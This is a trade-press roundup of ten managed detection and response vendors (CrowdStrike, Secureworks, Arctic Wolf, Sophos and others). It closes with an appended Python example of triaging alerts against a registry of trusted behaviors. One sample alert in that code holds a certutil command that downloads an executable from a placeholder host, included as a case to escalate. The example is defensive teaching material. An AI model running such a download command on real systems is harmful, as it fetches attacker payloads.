10 MDR Security Companies Making Moves In 2023 (So Far)

These MDR (managed detection and response) providers have been expanding their security offerings into new areas and doubling down on working with channel partners.

Latest Moves On MDR

With cybersecurity talent hard to come by and threats continuing to intensify, demand for managed security has boomed. A growing number of organizations are choosing a managed detection and response (MDR) platform to meet some or all of their needs for outside help with security, leading to surging growth for MDR security companies. Many of these MDR service providers have been making big moves in 2023, including by expanding their security offerings into new areas such as managed XDR (extended detection and response) and by doubling down on working with channel partners.

While the MDR field has gotten crowded with dozens of players now in the market, analysts at research firm Forrester have pinpointed some of the MDR security companies they view as at the head of the pack, in their just-released Forrester Wave ranking for managed detection and response vendors (for Q2 2023). The three MDR “Leaders” identified by Forrester are CrowdStrike, Expel and Red Canary. Meanwhile, cybersecurity giant CrowdStrike disclosed this week that its MDR market share, according to Gartner figures, has remained the largest in the segment for the second year in a row.


Other major security companies that are heavily focused on MDR services — and that appeared in the Forrester ranking as “Strong Performers” — include SentinelOne, Arctic Wolf and Secureworks. There have also been new entrants into the MDR security company market that are making big moves. Since last summer, Palo Alto Networks has been counting itself among those, with its Unit 42 division offering an MDR service powered by the vendor’s Cortex XDR platform.

While MDR is sometimes conflated with full security operations center (SOC) coverage in the market, the two are not identical, noted Eron Howard, COO at Novacoast, a large Wichita, Kan.-based MSSP. MDR generally has a narrower scope than a comprehensive SOC service would provide, for instance. However, many resellers have “gravitated towards MDR services” since they scale well and are relatively easy to operate, Howard said. The core criterion for MDR, according to Gartner, is that it is a human-led, remotely delivered service that includes around-the-clock detection, analysis, investigation and response to threats.

In terms of MDR’s growth, according to the latest figures available from Gartner, the MDR market ballooned by 48.9 percent in 2021. The research firm has also predicted that by 2025 the share of organizations using MDR services will reach 60 percent, double the share reported earlier this year.

What follows are the key details on 10 MDR security companies that have been making moves in 2023 so far.

CrowdStrike

In April, MDR market share leader CrowdStrike disclosed where it’s going next: Managed XDR (extended detection and response). The cybersecurity giant unveiled Falcon Complete XDR, a new managed XDR offering that aims to make the technology applicable to more customers and partners than it has been to date. The offering follows the model of CrowdStrike’s MDR service — which focuses on detecting threats on endpoint devices — and brings the managed model to the full range of tools and environments that are analyzed and correlated in the vendor’s XDR engine.

CrowdStrike’s managed XDR offering also integrates tools from vendors in key segments such as security service edge, identity security, email security, firewalls and network detection and response. And like with CrowdStrike’s MDR offering, its managed XDR service provides 24/7 management.

Falcon Complete XDR also includes threat hunting, monitoring and remediation, CrowdStrike said.

Ultimately, as EDR was getting established, MDR helped many organizations to adopt the advanced endpoint security capabilities, noted CrowdStrike’s chief business officer, Daniel Bernard (pictured). “And likewise, managed XDR becomes an offering that’s really compelling for organizations looking to get into XDR or get the full value out of XDR,” Bernard told CRN.

Secureworks

As Secureworks continues its transition from an MSSP to a vendor focused on XDR and MDR, the company has made a number of recent notable enhancements to its Taegis platform. In March, the company announced the debut of its Taegis Security Posture Dashboard, which aims to provide customers and partners with a comprehensive, user-friendly interface to monitor and evaluate their security posture. Key features include an event pipeline, which gives a quick view of how security events are being handled; an “alerts per endpoint” feature to show how much activity is related to certain endpoints, and how that compares to the rest of the industry; and “investigation response,” which provides an assessment of the speed and effectiveness of investigations. The Security Posture Dashboard is free for all Taegis partners and customers, including those leveraging the Secureworks MDR service, Taegis ManagedXDR.

Meanwhile, also in March, Secureworks announced expanded support for Google Cloud as well as for Google Workspace applications. The expansion enables organizations to improve alert visibility and traceability, while accelerating investigation times, according to the company.

In an interview with CRN in April, Secureworks President and CEO Wendy Thomas (pictured) said that the company is “building relationships with different partners so customers have the best security options possible in the space. [We want to] integrate in a way that customers gain bidirectional benefit — where both products get better — so that a customer of both is better off from a security perspective.”

The company was named a “Strong Performer” in the latest Forrester Wave ranking for MDR.

Arctic Wolf

While Arctic Wolf’s first foray into the market was around managed detection and response, the company has been busy expanding well beyond MDR as it seeks to help solve multiple security problems and address multiple attack surfaces, said Nick Schneider, president and CEO of Arctic Wolf, in a recent interview with CRN. “Where our story really evolves is that we’re not only doing detection and response, and doing detection or response against multiple attack surfaces — but we’re adding to that same platform capabilities on vulnerability management, capabilities on awareness training, capabilities with regards to incident response and mechanisms for customers to understand their overall security posture,” Schneider said.

Among Arctic Wolf’s major recent moves was its launch of a retainer option for its cyber incident response services, which aims to allow partners to more easily supply their customers with rapid access to the services. The Arctic Wolf Incident Response JumpStart Retainer features benefits such as a guarantee that cyber incidents will receive a response within one hour, backed by a service-level agreement.

“I think detection and response is resonating with customers. But I think what customers are looking for, more than specifically detection and response, is a security partner that can help them to solve more than one problem, and can look at more than one attack surface,” Schneider told CRN. “Most of the customers we talk to are completely fed up with the number of tools that they’ve been asked to buy, or the number of tools that they’ve been told they need to deploy within their environment to understand their security posture. Most customers just want to know, ‘Am I protected or am I not protected?’”

The company was named a “Strong Performer” in the latest Forrester Wave ranking for MDR.

SentinelOne

Through its Singularity XDR platform, SentinelOne promises “full MDR capabilities” — including response, remediation and threat hunting. The company also offers its own 24/7 MDR service, SentinelOne Vigilance Respond.

In February, SentinelOne expanded its set of industry collaborations around MDR with the release of N-able’s new Managed EDR service. The N-able Managed Endpoint Detection and Response service is powered by SentinelOne Vigilance Respond, the companies disclosed.

Meanwhile, major recent enhancements to Singularity XDR include the unveiling in April of a new threat hunting tool, dubbed Purple AI, which is the first in a series of planned products from the company that will be powered by generative AI. “I think for us, it’s a whole new way to reimagine cybersecurity,” SentinelOne co-founder and CEO Tomer Weingarten (pictured) said during a recent interview with CRN. “What it can do — even today in the limited preview that we put out there — is astounding. It takes any entry-level analyst and makes them a ‘super analyst.’ … You can traverse through more data with more speed with more accuracy.”

The company was named a “Strong Performer” in the latest Forrester Wave ranking for MDR.

Sophos

For cybersecurity industry stalwart Sophos, the shift to delivering cybersecurity via an as-a-service model is a top priority for investment going forward — starting with the company’s MDR service. In April, Sophos disclosed that its MDR customer base grew by 33 percent over the prior six months, to a total of more than 16,000 customers. “We have more MDR customers than any other vendor that we’re aware of,” Sophos CEO Kris Hagerman (pictured) said in a recent interview with CRN.

In March, Sophos disclosed a suite of new endpoint security capabilities that feed into the MDR service, as well as into the underlying XDR platform that helps to power the MDR. The updates include new account health check capabilities, through which Sophos can inform endpoint customers if something appears off-base with their configuration. Another recently introduced capability is “adaptive active adversary protection,” which puts Sophos’ endpoint security product into what the company calls “breach mode” when it appears that a customer is under attack. The product can then prevent an executable from running, for instance, or can block a connection to a particular endpoint, disrupting attacks that are in progress.

MDR, however, is just the start of the vendor’s foray into the as-a-service arena. Sophos is “now moving to the next phase, which is to take what we deliver in MDR and make that available in our products,” Hagerman said. The ultimate goal is to take all of the products in the Sophos portfolio—including in endpoint, network, cloud and email security—and “deliver them as a service—and do it in a way that’s highly flexible for both customers and for our channel partners,” he said.

Palo Alto Networks

In August 2022, Palo Alto Networks’ Unit 42 division launched the company’s first-ever MDR service, built on the vendor’s Cortex XDR platform. The Unit 42 MDR service leverages the division’s well-regarded threat intelligence service, which goes a long way toward making the company’s MDR service “uniquely positioned” to improve customer security, said Wendi Whitmore (pictured), senior vice president at Unit 42, in an interview at the time.

In April, Palo Alto Networks took the next step in advancing its MDR service with the global expansion of the Unit 42 Digital Forensics and Incident Response (DFIR) Service, which includes 24/7 managed detection and response among its core offerings. In addition to MDR, the DFIR service consists of a variety of assessments as well as incident response preparedness, incident response and managed threat hunting.

Expel

Expel, which was named among the three leaders in the latest Forrester Wave ranking for MDR, has continued to expand its platform with a number of recent updates. In February, the company announced general availability of its MDR service for Kubernetes environments, which Expel called “the first-to-market offering of its kind.” This new offering “enables customers to secure their business across their Kubernetes environment and adopt new technologies at scale without being hindered by security concerns,” Expel said in a news release.

Then in April, Expel debuted a new product focused on helping security teams to determine where to focus first on tackling the highest-risk vulnerabilities. The product, Expel Vulnerability Prioritization, “empowers security teams to understand their most urgent risk areas within their detection and response workflows for seamless investigation and remediation,” the company said in a release. Ultimately, the tool “eliminates the need for teams to spend hours investigating vulnerabilities,” Expel said.

eSentire

eSentire, named a “Strong Performer” in the latest Forrester Wave ranking for MDR, has continued its evolution from an MSSP into an MDR platform vendor with the help of partners. In May 2022, eSentire revamped its partner program and relaunched it under the name e3, with a focus on meeting the needs of MSPs and MSSPs as well as VARs and master agents.

The new program has helped enable eSentire to generate an increasing percentage of its business through the channel, according to Bob Layton (pictured), the company’s chief channel officer. Two years ago, less than 30 percent of eSentire’s business derived from the channel. But as of this year, “we will have more than 70 percent of our business going through the channel,” Layton told CRN recently.

In many cases now, when it comes to MSP or MSSP firms that are delivering services to customers, “it’s eSentire under the hood,” he said. “The MSP is saying, it’s too expensive and time-consuming for me to try to build this myself.”

ReliaQuest

With its GreyMatter platform, ReliaQuest says it brings together technology and services to “deliver MDR outcomes” — increasingly, with the help of the channel. In February, ReliaQuest announced its commitment to include partners on all new deals as it seeks to accelerate the growth of GreyMatter.

The company’s GreyMatter security operations platform features an “open” XDR architecture — meaning it can be used to analyze data feeds from third-party tools, allowing customers to leverage their existing security products. The approach has caught on with partners, which already were involved with 70 percent of new ReliaQuest deals in the fourth quarter of 2022, according to Colin O’Connor (pictured), COO of ReliaQuest.

“From a VAR perspective, what’s really unique is that they’re not having to go in and explain why ReliaQuest is going to replace [tools] that they’ve sold them or put in their environment in the past,” O’Connor told CRN. “Instead they’re saying, ‘Hey, ReliaQuest and the GreyMatter solution actually can help you to maximize the investments you’ve made in tools like CrowdStrike or Splunk or SentinelOne, or your Palo Alto [Networks] stack, or Microsoft stack or whatever it is.”

ReliaQuest was named a “Contender” in the latest Forrester Wave ranking for MDR.

Critical Start

Calling its platform the “most efficient” MDR platform available, Critical Start leverages a registry of “trusted behaviors” that enables automated resolution of 99 percent of security alerts. “Where most other platforms require a user to make a final decision of ‘OK, this is known good based on this investigation that was automatically done’ — we’re saying, ‘We know this is good, so we’re just going to safely resolve it,’” said Randy Watkins (pictured), CTO at Critical Start, in a recent interview with CRN. “And doing that, it allows us to scale — and resolve 100 percent of alerts regardless of the criticality assigned from the organization.”

Recent updates for Critical Start’s MDR platform have included additional SIEM (security information and event management) support in its Security Services for SIEM offering. The expansion has come through support for Sumo Logic’s SIEM technology, aimed at enabling faster and more effective responses to threats for Sumo Logic customers.

Ultimately for Critical Start, “with our methodology, what we’re able to do is resolve every single alert — whether it’s critical, high, medium or low — because we’re looking at the individual alerts,” Watkins said. “We’re not waiting until it bubbles up to an incident and then trying to pick apart that incident.”
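To make the “trusted behaviors” idea concrete, the following is an added illustration written for this page; it is not Critical Start’s code and makes no claim about how its platform is built. It shows the per-alert approach Watkins describes: every alert, whatever its severity, is checked against a registry of known-good behaviors and either auto-resolved or escalated to an analyst, rather than waiting for alerts to be correlated into an incident first. The alert fields, rule names, process names, IP addresses and registry entries are all constructed for the example. The practitioner’s caveat it demonstrates is that a trusted-behavior entry must key on strong attributes (code signer, parent process, command-line shape, source address), not a process name alone, or an attacker who reuses a trusted name gets auto-resolved along with the legitimate activity.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Constructed sample alerts (not real telemetry). Field names are assumptions
# made for this example, not any vendor's schema.
ALERTS = [
    {"id": "A1", "severity": "low", "rule": "lolbin_exec",
     "process": "certutil.exe", "parent": "sccm_agent.exe",
     "signer": "Microsoft Windows", "cmdline": "certutil -hashfile pkg.msi SHA256"},
    # Same tool, but launched from Word and used to download: must escalate.
    {"id": "A2", "severity": "critical", "rule": "lolbin_exec",
     "process": "certutil.exe", "parent": "winword.exe",
     "signer": "Microsoft Windows", "cmdline": "certutil -urlcache -split -f http://x/y.exe"},
    # Looks like A1 but the binary is unsigned: a renamed tool, so escalate.
    {"id": "A3", "severity": "medium", "rule": "lolbin_exec",
     "process": "certutil.exe", "parent": "sccm_agent.exe",
     "signer": None, "cmdline": "certutil -hashfile pkg.msi SHA256"},
    # Port sweep from the authorized vulnerability scanner.
    {"id": "A4", "severity": "high", "rule": "vuln_scanner_portsweep",
     "process": "nessusd", "parent": "systemd", "signer": None, "src_ip": "10.0.5.20"},
]


@dataclass
class TrustedBehavior:
    """One entry in the trusted-behavior registry.

    Every predicate in `conditions` must hold for the alert to be treated as
    known-good. Missing fields never match, so a sparse alert is escalated
    rather than silently resolved.
    """
    name: str
    conditions: Dict[str, Callable[[object], bool]]

    def matches(self, alert: dict) -> bool:
        return all(key in alert and pred(alert[key])
                   for key, pred in self.conditions.items())


# Constructed registry. Note that each entry pins the detection rule plus
# several strong attributes, never just the process name.
REGISTRY: List[TrustedBehavior] = [
    TrustedBehavior("certutil-hash-by-sccm", {
        "rule": lambda v: v == "lolbin_exec",
        "process": lambda v: v.lower() == "certutil.exe",
        "parent": lambda v: v.lower() == "sccm_agent.exe",
        "signer": lambda v: v == "Microsoft Windows",   # unsigned copy must not match
        "cmdline": lambda v: "-hashfile" in v and "-urlcache" not in v,
    }),
    TrustedBehavior("authorized-scanner", {
        "rule": lambda v: v == "vuln_scanner_portsweep",
        "src_ip": lambda v: v in {"10.0.5.20", "10.0.5.21"},
    }),
]


def triage(alerts: List[dict],
           registry: List[TrustedBehavior]) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Give every alert a disposition, ignoring severity.

    Returns (resolved, escalated): resolved is a list of (alert id, registry
    entry name) pairs; escalated is the list of alert ids an analyst must see.
    """
    resolved: List[Tuple[str, str]] = []
    escalated: List[str] = []
    for alert in alerts:
        match = next((tb.name for tb in registry if tb.matches(alert)), None)
        if match is not None:
            resolved.append((alert["id"], match))
        else:
            escalated.append(alert["id"])
    return resolved, escalated


if __name__ == "__main__":
    done, todo = triage(ALERTS, REGISTRY)
    for alert_id, entry in done:
        print(f"{alert_id}: auto-resolved by trusted behavior '{entry}'")
    for alert_id in todo:
        print(f"{alert_id}: escalated to analyst")
```

Running the block resolves A1 and A4 and escalates A2 and A3: the low-severity A1 is closed without analyst time, while A3, which differs from A1 only in lacking a valid signer, is not. That last case is the one to test when writing registry entries, since an overly broad entry turns the registry into a blind spot.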